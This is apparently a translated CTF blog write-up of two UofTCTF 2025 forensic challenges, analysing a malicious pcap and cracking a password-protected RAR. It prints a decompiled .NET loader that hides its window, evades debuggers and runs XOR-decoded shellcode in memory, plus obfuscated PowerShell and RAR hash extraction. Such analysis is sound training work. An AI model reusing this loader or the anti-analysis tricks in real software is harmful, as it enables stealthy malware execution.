{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-uoftctf-2025-en","result":{"data":{"markdownRemark":{"id":"a91221cf-6126-5748-930a-6e2dbb5f00f6","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-uoftctf-2025\">original page</a>.</p>\n</blockquote>\n<p>We participated in UoTCTF 2025 as 0nePadding and placed 43rd out of 897 teams. (Though I personally didn’t solve many challenges this time.)</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/9d656f16e15262dcb20ff0090230384c/7bf07/image-20250113211514744.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 22.916666666666668%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAeklEQVQY05WQSw7DIAwFuf9NGzA/mygBpFdwS7sNixHYetgjTIgR1idFRMADecDKMTOIaJyfu5FSIOeNu1a01rap411KCfVbGyKPF0W4sGe4yJlxWKt201INfT6Ry4Xe+5bdzE/DOXT1jA8BB8X/H+qmh6hhhnPu13sDRRKDGBi4RLAAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/9d656f16e15262dcb20ff0090230384c/8ac56/image-20250113211514744.webp 240w,\n/static/9d656f16e15262dcb20ff0090230384c/d3be9/image-20250113211514744.webp 480w,\n/static/9d656f16e15262dcb20ff0090230384c/e46b2/image-20250113211514744.webp 960w,\n/static/9d656f16e15262dcb20ff0090230384c/d9e4a/image-20250113211514744.webp 1128w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/9d656f16e15262dcb20ff0090230384c/8ff5a/image-20250113211514744.png 240w,\n/static/9d656f16e15262dcb20ff0090230384c/e85cb/image-20250113211514744.png 480w,\n/static/9d656f16e15262dcb20ff0090230384c/d9199/image-20250113211514744.png 960w,\n/static/9d656f16e15262dcb20ff0090230384c/7bf07/image-20250113211514744.png 1128w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/9d656f16e15262dcb20ff0090230384c/d9199/image-20250113211514744.png\"\n            alt=\"image-20250113211514744\"\n            title=\"image-20250113211514744\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Here is a brief writeup of the challenges I solved.</p>\n<h2 id=\"poofforensic\" style=\"position:relative;\"><a href=\"#poofforensic\" aria-label=\"poofforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Poof(Forensic)</h2>\n<blockquote>\n<p>Yet another pcap, no usb traffic in this one so I’m lost. Can you help me out? :)</p>\n</blockquote>\n<p>Analyzing the pcap file provided as the challenge binary revealed that suspicious PS1 files and other artifacts were being retrieved from a suspicious IP address.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 528px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/3262554099361af9895df1c77d6a094a/4af8e/image-20250111212443760.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 55.833333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB2UlEQVQoz21S2ZKiQBDkWzwiRkXkRg51RFgRAV0c9cH//46cynKJ2Indh4qG7Doys9ow4xqu58H3PXieC9d19fQDX8/l0oRpDrH4T/zEjel0itnHB0ajkcZ4PMZkMgFxnj/xNzbkTMaTf+6MJElQVRXiOMZ2u0WWZQiCQIPYZrPFbrdDmiaiwtdgThRFWK9j7Pd7sAfxMAxhFEWJsjggFvD1euF2u0lBKnI9abbB/f7A4/FA2zQ4Ho84HA6o6xplWSLT+zsulw5FUbwbcpLjOOLVEt3loomOY6vk1WqFpmmlSQFzsdB/ekaGbdsJs1ibUA3r5/M5DMqyrCVm8vMl006nGlEYYDab6YL6/iZNG6xlcJKmWkxriOd5jvP5jK7r1AL6aaSa5Mt0WwvpZ3OmvEqY5TjKPws5fSEsOWj3+YlfosR1PdCy0+mkdljCUhgmQjuAbTt4Pp/qYSgsLMvSqc+HYMKGTDhw8K/vf8uiMhm2VysG24ws26gcS8C+79V827bfkmUxbHa9XsWzVu5a/a6EzUX8zve5LC5T9sNbVYaD5E6KyMSVaUzipunPIIlR/bGAGBnyOdEKslOGUbTWwsFDJnLLQ0Myq2VR2kx85T3fHk8+K27674bftjJwf+s9EQAAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/3262554099361af9895df1c77d6a094a/8ac56/image-20250111212443760.webp 240w,\n/static/3262554099361af9895df1c77d6a094a/d3be9/image-20250111212443760.webp 480w,\n/static/3262554099361af9895df1c77d6a094a/83811/image-20250111212443760.webp 528w\"\n              sizes=\"(max-width: 528px) 100vw, 528px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/3262554099361af9895df1c77d6a094a/8ff5a/image-20250111212443760.png 240w,\n/static/3262554099361af9895df1c77d6a094a/e85cb/image-20250111212443760.png 480w,\n/static/3262554099361af9895df1c77d6a094a/4af8e/image-20250111212443760.png 528w\"\n            sizes=\"(max-width: 528px) 100vw, 528px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/3262554099361af9895df1c77d6a094a/4af8e/image-20250111212443760.png\"\n            alt=\"image-20250111212443760\"\n            title=\"image-20250111212443760\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This file appeared to be one that executes an obfuscated PowerShell script.</p>\n<p>After deobfuscating the first few lines, it became apparent that variables named Key and IV were being defined.</p>\n<div class=\"gatsby-highlight\" data-language=\"key\"><pre class=\"language-key\"><code class=\"language-key\"># Key\n.(&quot;{1}{0}{2}&quot; -f &#39;-Va&#39;,&#39;Set&#39;,&#39;riable&#39;) -Name (&quot;{0}{1}&quot; -f &#39;ke&#39;,&#39;y&#39;) -Value (  $Vs52aR::&quot;u`TF8&quot;.(&quot;{2}{0}{1}&quot; -f &#39;etBy&#39;,&#39;tes&#39;,&#39;G&#39;).Invoke(((&quot;{0}{2}{1}&quot;-f&#39;sk&#39;,&#39;89&#39;,&#39;sd&#39;)+&#39;D2G&#39;+(&quot;{0}{1}&quot;-f &#39;0X9&#39;,&#39;j&#39;)+(&quot;{1}{0}&quot; -f &#39;F&#39;,&#39;k2f&#39;)+(&quot;{0}{1}&quot;-f (&quot;{0}{1}&quot;-f&#39;1&#39;,&#39;b4S&#39;),&#39;2&#39;)+&#39;a7&#39;+(&quot;{1}{0}&quot;-f &#39;a&#39;,&#39;Gh8&#39;)+&#39;Vk0&#39;+&#39;L&#39;)))\n\n# IV\n.(&quot;{0}{2}{1}&quot;-f &#39;Set&#39;,&#39;Variable&#39;,&#39;-&#39;) -Name (&#39;iv&#39;) -Value ( ( VArIaBlE  (&quot;{0}{1}&quot;-f&#39;Y8&#39;,&#39;F&#39;)  -ValuEo )::&quot;U`Tf8&quot;.(&quot;{0}{2}{1}&quot;-f &#39;Get&#39;,&#39;tes&#39;,&#39;By&#39;).Invoke(((&quot;{1}{0}&quot; -f &#39;e&#39;,(&quot;{0}{1}&quot; -f &#39;Md3&#39;,&#39;3&#39;))+&#39;F&#39;+&#39;a&#39;+(&quot;{0}{2}{1}&quot; -f &#39;0&#39;,&#39;Z&#39;,(&quot;{0}{1}&quot;-f &#39;wN&#39;,&#39;x2&#39;))+&#39;q&#39;+(&quot;{3}{2}{1}{0}&quot;-f&#39;Y1&#39;,(&quot;{1}{2}{0}&quot;-f&#39;m&#39;,&#39;7oN&#39;,&#39;45&#39;),(&quot;{1}{0}{2}&quot; -f &#39;6&#39;,&#39;LjK&#39;,&#39;X9t3G&#39;),&#39;5&#39;))))</code></pre></div>\n<p>The Key and IV extracted from the obfuscated script were as follows.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 616px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/7be3338b7c950a74be58bf0691135982/40040/image-20250111214114131.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 19.583333333333332%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA70lEQVQY0y3PyXLCMBBFUS8DHiQZMBiL0bM8IExMqFT+/7duVCGLVz0suk57+0xzPF85Vx1501GZgaLtycuayzUn05ptmhGfGlYuan9mk2pEkiF3R6JNyjo9uhyQhwpvGAbujxk7f3OfX9jHk9H19j5hx4G2rpBSEoSCUCgCf4nv+4SBTxC5fSTes5CEMsYr65baiYz9pOkt4/Rkmia66Yt+/qEeHuwPJ9b5jfjSE+80cXZlV97YlpZNYUmSBOnESpd4VdNSNYbaHSv+XzZdR2FGzPSiNDeEcLroLYxW278qEu3kCqlilFIsFwv85Qe/H5xsoKxzJD8AAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/7be3338b7c950a74be58bf0691135982/8ac56/image-20250111214114131.webp 240w,\n/static/7be3338b7c950a74be58bf0691135982/d3be9/image-20250111214114131.webp 480w,\n/static/7be3338b7c950a74be58bf0691135982/26c8a/image-20250111214114131.webp 616w\"\n              sizes=\"(max-width: 616px) 100vw, 616px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/7be3338b7c950a74be58bf0691135982/8ff5a/image-20250111214114131.png 240w,\n/static/7be3338b7c950a74be58bf0691135982/e85cb/image-20250111214114131.png 480w,\n/static/7be3338b7c950a74be58bf0691135982/40040/image-20250111214114131.png 616w\"\n            sizes=\"(max-width: 616px) 100vw, 616px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/7be3338b7c950a74be58bf0691135982/40040/image-20250111214114131.png\"\n            alt=\"image-20250111214114131\"\n            title=\"image-20250111214114131\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Continuing to deobfuscate further revealed that a PE file was being obtained by decrypting a file containing a HEX string retrieved from the same IP address.</p>\n<p>Using the extracted Key and IV to decrypt the data, I was able to recover the suspicious PE file.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/45c501d3868fbf9f25518031f8551ecd/d4377/image-20250111214016245.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 26.25%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA30lEQVQY03WQ226DMBBE/f9/WCktFNsBxzZgfIGYy3QxjZqXrjQ6M7vSPCyr1SdaJ2Cjgg4dTFAw5E/e5AeEamCtxTiOl9wf3a8fhqHQOQf23d/ATQ3tWyps0U4c3ShLtumBtpeo6xpVVeGLdPKVT75LKQWm3B0+TXDzgCFapBzQBw09KixbQu8NpJQQQhTJuwTnHE3TlHx6Ia+dNgYs70+sx4p1z8jbs/CljfYxBXRdB+895pQQY0QM4eKbD8REd4b/5riwzDO81gj0x0g/ylS8TBMW8jsVHXTfSYVU+AOR4nvnEFtlKQAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/45c501d3868fbf9f25518031f8551ecd/8ac56/image-20250111214016245.webp 240w,\n/static/45c501d3868fbf9f25518031f8551ecd/d3be9/image-20250111214016245.webp 480w,\n/static/45c501d3868fbf9f25518031f8551ecd/e46b2/image-20250111214016245.webp 960w,\n/static/45c501d3868fbf9f25518031f8551ecd/9447f/image-20250111214016245.webp 1294w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/45c501d3868fbf9f25518031f8551ecd/8ff5a/image-20250111214016245.png 240w,\n/static/45c501d3868fbf9f25518031f8551ecd/e85cb/image-20250111214016245.png 480w,\n/static/45c501d3868fbf9f25518031f8551ecd/d9199/image-20250111214016245.png 960w,\n/static/45c501d3868fbf9f25518031f8551ecd/d4377/image-20250111214016245.png 1294w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/45c501d3868fbf9f25518031f8551ecd/d9199/image-20250111214016245.png\"\n            alt=\"image-20250111214016245\"\n            title=\"image-20250111214016245\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Since this file appeared to be a .NET PE file, I proceeded to analyze it with ILSpy.</p>\n<p>However, for some reason, ILSpy was unable to analyze parts of the code.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 917px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/aded1ce129c194d4a7c9a5b8482b5660/59000/image-20250111215117312.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 64.16666666666666%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAACEElEQVQ4y41T2ZaaQBT0/z8rJ+bM0ZlEHZB9FYMKiNDsi5XbrRPDOA95qNPXVsq6VcUsin1kBx31RUJykhElGtJMR5Fu0RcKcrZF25kAfIJ3h4/x6mAYbIyjI+6uV1dgdoWLLHlHGPxCsF8h8F/h2hscnA1O3g9Y3pLmOcLDGrtgAded43Bag2VbJOcN2taYEvIPxXENebPARnqBYy8R7l9xid9RZjKKUkXBFJS1iaJQkecySlI+1Daa1hIkD0IPs5GGlqlIEwlhaOB4lBFfFIKKS6ahqS10nYW60dG3NhGZYMUWZWkQuYmmMacKm8ZFdHZREkFBpHlKaqIN4liiH1tCRVlq6Hv79tDo/n34A1MPSWaW6/C8F/jkX7D/SasZRGKiJjVNZ9OsigA+HnyE4z3dCQ+zi4YDmX48viFJZKSphCxTBOktxd2nlD3h12el91Bo3dKhFTUiW+F8loiYVo7IgsJFVWl0KmCMQyc4pJz/ifs1oRjoy74ns6lzN2XGRAVXOQwOxoF76BO8p7X/WdlHtV9g53xHSP2Kdm+i4Ix5YuWq0oWXebWFkc+hpN8QsCWqTkPd0QvQKmLmZ9EovNgeauphvFtQUeV71xTyUaWqmCJdjo42KFoVrOEEVKGR7keq1GA9TsItFEb9+70S3mVU5opS5RY8J+p/GdBkZe5N2/K+2XTaYr5VxJ/063/xB5kr1eN799zEAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/aded1ce129c194d4a7c9a5b8482b5660/8ac56/image-20250111215117312.webp 240w,\n/static/aded1ce129c194d4a7c9a5b8482b5660/d3be9/image-20250111215117312.webp 480w,\n/static/aded1ce129c194d4a7c9a5b8482b5660/f91b9/image-20250111215117312.webp 917w\"\n              sizes=\"(max-width: 917px) 100vw, 917px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/aded1ce129c194d4a7c9a5b8482b5660/8ff5a/image-20250111215117312.png 240w,\n/static/aded1ce129c194d4a7c9a5b8482b5660/e85cb/image-20250111215117312.png 480w,\n/static/aded1ce129c194d4a7c9a5b8482b5660/59000/image-20250111215117312.png 917w\"\n            sizes=\"(max-width: 917px) 100vw, 917px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/aded1ce129c194d4a7c9a5b8482b5660/59000/image-20250111215117312.png\"\n            alt=\"image-20250111215117312\"\n            title=\"image-20250111215117312\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>So I tried using dnSpy instead, which allowed me to view the decompiled results of the challenge binary as shown below. (The reason ILSpy failed to analyze it is unclear.)</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 749px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/d89e28be9534d69bc1b5d2bb2c65b65f/5bb8b/image-20250111215050507.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 108.33333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAWCAYAAADAQbwGAAAACXBIWXMAAAsTAAALEwEAmpwYAAACbElEQVQ4y41UV5bjMAybe7io21az4yl7/5thQTnJJJuZbD74KBdCACjxbRxHKGPgUoSNM+yWsVSPGC1sTijvFb4GKDfCBNWyTQZm1hiGAVJ/G2+jUpDQYUYgaGFBnB2LInLQqAQpboD3jv8EBM+NjUPf92eQ4RFQdmos80JWE8JChnWBsxqq76BZNMh/DKX4TkjIu0FiPOcjDkB+1JaspkQpE3NAWhYYT6lcz2SabYfkNYw1d1IVa1XLtwzlBXe2fkLMGT7GBhzoaQ4DUjBIk6dch3kmc0ofnFjgkVyHyI0iNzZG3wLSaGvJ1EKx0DuFKdg7OX0/3D1/e3ish1sPtQtYEjtMZsYLixXeTM0vzZ211i2LZEO/G4AAtzz+4+EZNJWIeipI64o1n7CVEwqPUa6pvc8lwTnbQp1rfjw2w6jaLnUrOH1sWFlc98wo2PYVG8/iulcCRgz9t/QLyx8AD9rC8OPP3kBbvK/YP8mU+f3r1J5vmT1heABGnkMpXk+1SZR15boxJnuR/pvUR8DxACxrvovm33b4F3g0Xgc8SxapjSU9E4nbXq9r+f4i4PGTMBEP98+thfgmHooFW/Nze7gpTwETZQmjS7elwxc/JYslvzXjRw/nZbp6J/LEPwl5Drx6tzfkN9AroDws6eiyHObWYTIV/4TdBfBFhsc4imk+N2JtXRWJKceWffBPgR7moeFdDkvENAdYXq3rT20Gqpfk3gFqS8C8k03h+CezlGgBj4nn2OK4+h/Qo4e8n9Oc8fX5hVoqWRKEM7LrBkZ3Hfn3o+sJoCYTz4468W62WH2HzOFZfI9Ext6/5uFf1KlqZZ7CMoQAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/d89e28be9534d69bc1b5d2bb2c65b65f/8ac56/image-20250111215050507.webp 240w,\n/static/d89e28be9534d69bc1b5d2bb2c65b65f/d3be9/image-20250111215050507.webp 480w,\n/static/d89e28be9534d69bc1b5d2bb2c65b65f/71afc/image-20250111215050507.webp 749w\"\n              sizes=\"(max-width: 749px) 100vw, 749px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/d89e28be9534d69bc1b5d2bb2c65b65f/8ff5a/image-20250111215050507.png 240w,\n/static/d89e28be9534d69bc1b5d2bb2c65b65f/e85cb/image-20250111215050507.png 480w,\n/static/d89e28be9534d69bc1b5d2bb2c65b65f/5bb8b/image-20250111215050507.png 749w\"\n            sizes=\"(max-width: 749px) 100vw, 749px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/d89e28be9534d69bc1b5d2bb2c65b65f/5bb8b/image-20250111215050507.png\"\n            alt=\"image-20250111215050507\"\n            title=\"image-20250111215050507\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Looking at this code, it simply XORs a hardcoded byte array to decrypt some data.</p>\n<div class=\"gatsby-highlight\" data-language=\"c#\"><pre class=\"language-c#\"><code class=\"language-c#\">using System;\nusing System.Diagnostics;\nusing System.Runtime.CompilerServices;\nusing System.Runtime.InteropServices;\n\nnamespace Kljansdfkansdf\n{\n// Token: 0x02000003 RID: 3\n[NullableContext(1)]\n[Nullable(0)]\npublic class Kljansdfkansdf\n{\n// Token: 0x06000009 RID: 9 RVA: 0x00002080 File Offset: 0x00000280\npublic static void kjfadsiewqinfqniowf(byte[] ncuasdhif)\n{\nuint num = Win32.VirtualAlloc(0U, (uint)ncuasdhif.Length, Win32.MEM_COMMIT, Win32.PAGE_READWRITE);\nMarshal.Copy(ncuasdhif, 0, (IntPtr)((UIntPtr)num), ncuasdhif.Length);\nuint num2;\nWin32.VirtualProtect((IntPtr)((UIntPtr)num), (UIntPtr)((IntPtr)ncuasdhif.Length), Win32.PAGE_EXECUTE_READ, out num2);\nIntPtr zero = IntPtr.Zero;\nuint num3 = 0U;\nIntPtr zero2 = IntPtr.Zero;\nWin32.WaitForSingleObject(Win32.CreateThread(0U, 0U, num, zero2, 0U, ref num3), uint.MaxValue);\n}\n\n// Token: 0x0600000A RID: 10 RVA: 0x000020E4 File Offset: 0x000002E4\nprivate static void Main(string[] args)\n{\nWin32.ShowWindow(Win32.GetConsoleWindow(), Win32.SW_HIDE);\nif (Debugger.IsAttached)\n{\nEnvironment.Exit(0);\n}\nforeach (Process process in Process.GetProcesses())\n{\nif (process.ProcessName.Contains(&quot;devenv&quot;) || process.ProcessName.Contains(&quot;dnspy&quot;))\n{\nEnvironment.Exit(0);\n}\n}\nbyte[] array = new byte[]\n{\n129, 149, byte.MaxValue, 125, 125, 125, 29, 244, 152, 76,\n189, 25, 246, 45, 77, 246, 47, 113, 246, 47,\n105, 246, 15, 85, 114, 202, 55, 91, 76, 130,\n209, 65, 28, 1, 127, 81, 93, 188, 178, 112,\n124, 186, 159, 143, 47, 42, 246, 47, 109, 246,\n55, 65, 246, 49, 108, 5, 158, 53, 124, 172,\n44, 246, 36, 93, 124, 174, 246, 52, 101, 158,\n71, 52, 246, 73, 246, 124, 171, 76, 130, 209,\n188, 178, 112, 124, 186, 69, 157, 8, 139, 126,\n0, 133, 70, 0, 89, 8, 153, 37, 246, 37,\n89, 124, 174, 27, 246, 113, 54, 246, 37, 97,\n124, 174, 246, 121, 246, 124, 173, 244, 57, 89,\n89, 38, 38, 28, 36, 39, 44, 130, 157, 34,\n34, 39, 246, 111, 150, 240, 32, 23, 124, 240,\n248, 207, 125, 125, 125, 45, 21, 76, 246, 18,\n250, 130, 168, 198, 141, 200, 223, 43, 21, 219,\n232, 192, 224, 130, 168, 65, 123, 1, 119, 253,\n134, 157, 8, 120, 198, 58, 110, 15, 18, 23,\n125, 46, 130, 168, 30, 16, 25, 93, 82, 30,\n93, 19, 24, 9, 93, 8, 14, 24, 15, 93,\n17, 24, 26, 20, 9, 8, 14, 24, 15, 93,\n8, 18, 27, 9, 30, 9, 27, 6, 42, 73,\n14, 34, 76, 41, 34, 47, 78, 28, 17, 17,\n4, 34, 28, 51, 34, 52, 16, 13, 17, 73,\n19, 9, 66, 66, 0, 93, 82, 28, 25, 25,\n93, 82, 4, 125\n};\nbyte b = 125;\nfor (int j = 0; j &lt; array.Length; j++)\n{\nbyte[] array2 = array;\nint num = j;\narray2[num] ^= b;\n}\nKljansdfkansdf.kjfadsiewqinfqniowf(array);\n}\n}\n}</code></pre></div>\n<p>By XOR-decrypting this byte array with 125, it was possible to identify the correct flag.</p>\n<h2 id=\"decrypt-meforensic\" style=\"position:relative;\"><a href=\"#decrypt-meforensic\" aria-label=\"decrypt meforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Decrypt Me(Forensic)</h2>\n<blockquote>\n<p>I encrypted my encryption script, but I forgot the password. Can you help me decrypt it?</p>\n</blockquote>\n<p>Analyzing the encrypted RAR file provided as the challenge binary with rar2hashcat yielded the following hashes. (rar2john also works.)</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">./rar2hashcat flag.rar\n\n<span class=\"token variable\">$rar5</span><span class=\"token variable\">$16</span><span class=\"token variable\">$1d7cb8859a6c3c8e30a9db7a501811ac</span><span class=\"token variable\">$15</span><span class=\"token variable\">$280234db9d29c6ab216b74e6a89ec226</span><span class=\"token variable\">$8</span><span class=\"token variable\">$d12d4ba211b9c642</span>\n<span class=\"token variable\">$rar5</span><span class=\"token variable\">$16</span><span class=\"token variable\">$1d7cb8859a6c3c8e30a9db7a501811ac</span><span class=\"token variable\">$15</span><span class=\"token variable\">$7d06143b1a7dab3327b3ef1e41ad881a</span><span class=\"token variable\">$8</span><span class=\"token variable\">$d12d4ba211b9c642</span></code></pre></div>\n<p>Reference: <a href=\"https://github.com/hashstation/rar2hashcat/releases/tag/1.0\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Release rar2hashcat 1.0 · hashstation/rar2hashcat · GitHub</a></p>\n<p>Cracking this hash with rockyou.txt revealed the decompression password.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 878px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/68c790819b9c00f0b637596b4bcd101f/94829/image-20250112214205715.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 51.25000000000001%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABiklEQVQoz0VS17aDMAzrY/cuUDooFAgjDaPj/v+X6UbuCX3wie3YkuJ4tD+fEWUdblmPKNco6hyqVDjbfBiGCIJAbLvdwvM8nE4n+L4vuc1mg8lkgul0itlshvl8jlFda1QWoDEauirxjStorZHnOaIoQhzHSNNUTsbOrtcrjsejGMEIagFrW5ig6zroxwNN0wwNl8tFmgiUJImoo9LFYiEAy+VSVK5Wq5/C5/MpYG3bitEniTFG/L7vh3uS8VRKiWLW8STYAOiaeMkGWlmWA8H7/QZJX68XHvYFjvTz+Qw+lQ6ALPoy3VEUhfWrgZ13VErfzZQ+6xhnWSbx7XaTMcgMjWlBoyoW0c/tk5rGDIoJSnPKnQg+nfFut/sp7NsarVG43xNoq848FLI0ERUEqKpKThoVUSWBnEISEnA8Hn8VNrWPrt7jFPoWKMZfF6JUETw/wNn+Kn+Zxh/nL7v9ZI77yNzhcBCfG2BnaCyrEiY+w60LV4XNbOSMuDbMuV1kbr1eCwhXhyoZ/wP7YBe5IChKXAAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/68c790819b9c00f0b637596b4bcd101f/8ac56/image-20250112214205715.webp 